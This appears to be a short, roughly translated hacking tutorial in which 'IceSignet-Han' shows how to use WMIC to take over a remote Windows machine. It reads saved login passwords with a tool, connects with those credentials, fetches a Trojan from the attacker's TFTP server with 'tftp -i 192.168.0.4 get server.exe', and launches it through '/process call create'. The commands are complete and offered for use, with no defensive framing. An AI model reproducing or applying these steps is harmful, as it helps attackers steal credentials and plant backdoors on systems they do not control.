IceSignet battle contest
HELLO! Hello everyone, I'm IceSignet-Han. Today, I want to explain the basic application of WMI commands to caicai.
First, the WMI command must be executed on the WMIC console. Enter WMIC in CMD to automatically install
After the installation is complete
Next, we need to know the password on the machine. Let's see it with Knight.
You can see a lot of passwords...
Click the one at the bottom to see the login password. I have created the login password here for the convenience of the tutorial.
The connection format is as follows:
/Node: "ip address"/user: "user Name"/password: "password"
Next we will build a small FTP Server
Configure
Start Service
Execute the CMD command using the PROCESS command on the WMIC Console
The format is as follows:/process call create "cmd command"
Send the Trojan Horse
/Process call create "tftp-I 192.168.0.4 get server.exe"
Here, serve. Exe is our server
Run the following line on the server:
/Process call create "server.exe"
Wait...
Launched
See
Now, the important thing is the idea... 88.